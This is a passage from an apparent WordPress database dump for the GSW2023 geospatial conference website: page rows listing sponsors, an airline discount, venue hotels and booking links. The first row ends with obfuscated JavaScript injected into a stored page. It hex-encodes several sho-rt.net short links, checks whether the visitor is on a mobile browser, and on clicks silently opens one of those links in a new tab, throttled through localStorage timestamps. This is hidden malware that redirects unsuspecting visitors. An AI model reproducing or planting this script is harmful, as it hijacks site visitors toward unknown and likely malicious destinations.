_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:30:03','2023-06-24 01:30:03','',3066,'https://gsw2023.com/?p=4792',0,'revision','',0),
(4793,1,'2023-06-24 01:31:30','2023-06-24 01:31:30','','6c0414f1-abcc-46a4-8e17-e17eb60be7b5','','inherit','open','closed','','6c0414f1-abcc-46a4-8e17-e17eb60be7b5','','','2023-06-24 01:31:30','2023-06-24 01:31:30','',3066,'https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5.jpg',0,'attachment','image/jpeg',0),
(4794,1,'2023-06-24 01:32:04','2023-06-24 01:32:04','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570070822{margin-top: -20px !important;}\"]</p>\n<h5 style=\"text-align: 